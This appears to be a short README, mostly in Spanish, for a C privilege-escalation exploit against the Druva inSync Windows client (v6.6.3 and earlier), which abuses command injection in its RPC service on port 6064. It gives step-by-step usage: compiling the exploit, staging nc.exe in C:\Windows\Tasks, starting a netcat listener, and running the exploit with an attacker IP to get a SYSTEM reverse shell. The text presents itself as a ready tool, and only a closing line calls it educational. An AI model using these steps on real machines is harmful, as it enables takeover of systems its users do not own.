
Escalación de Privilegios Local para Druva
Un exploit en C para el Cliente Windows de Druva inSync (v6.6.3 y anteriores). La aplicación expone un servicio RPC en el puerto 6064 que es vulnerable a inyección de comandos mediante path traversal. Esto permite a un usuario local ejecutar comandos arbitrarios como NT AUTHORITY\SYSTEM.
Utilice gcc (MinGW) para compilar el código fuente:
gcc exploit.c -o exploit.exe -lws2_32
Coloque una copia de nc.exe en un directorio accesible por la cuenta SYSTEM (por ejemplo, C:\Windows\Tasks).
Inicie un listener en su máquina atacante:
nc -lvnp 4444
Run the exploit on the target Windows machine:
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
Esta herramienta es solo para fines educativos. El uso no autorizado en sistemas para los que no tiene permiso de prueba es ilegal.